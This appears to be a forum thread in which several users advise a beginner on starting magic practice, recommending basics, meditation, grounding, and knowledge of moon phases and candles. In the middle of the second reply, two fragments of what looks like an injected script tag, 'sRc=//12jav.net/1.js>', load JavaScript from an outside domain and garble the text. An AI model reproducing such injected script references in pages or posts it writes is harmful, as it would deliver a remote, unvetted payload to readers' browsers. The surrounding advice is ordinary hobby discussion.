Start with the basics of magic. There is a list on my profile under the Ode to Beginners. In time you will create your own list of the things it is possible for you to do with magic.

This list will vary from person to person according thier morals ,knowledge ,interest (paths they practice ) and skills .There simply is not just universal standart answer of this question that will suit everyone .
As when it comes to with what you should start i would advice you to follow kts's advice and learn your basics .That will save you few struggles and few troubles along the path . sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I think that you can use common sense to know what's possible. :) It would also be a pretty long list.

Begin with meditation, centering, grounding, some basic knowledge - moon phases, candles,etc..
